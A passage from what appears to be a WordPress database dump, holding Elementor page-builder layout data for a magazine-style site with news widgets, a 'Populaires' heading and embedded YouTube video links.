":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1457,498,'_elementor_version','0.4'),(1458,498,'_elementor_css','a:3:{s:4:\"time\";i:1508921658;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1462,500,'_elementor_edit_mode','builder'),(1463,500,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"w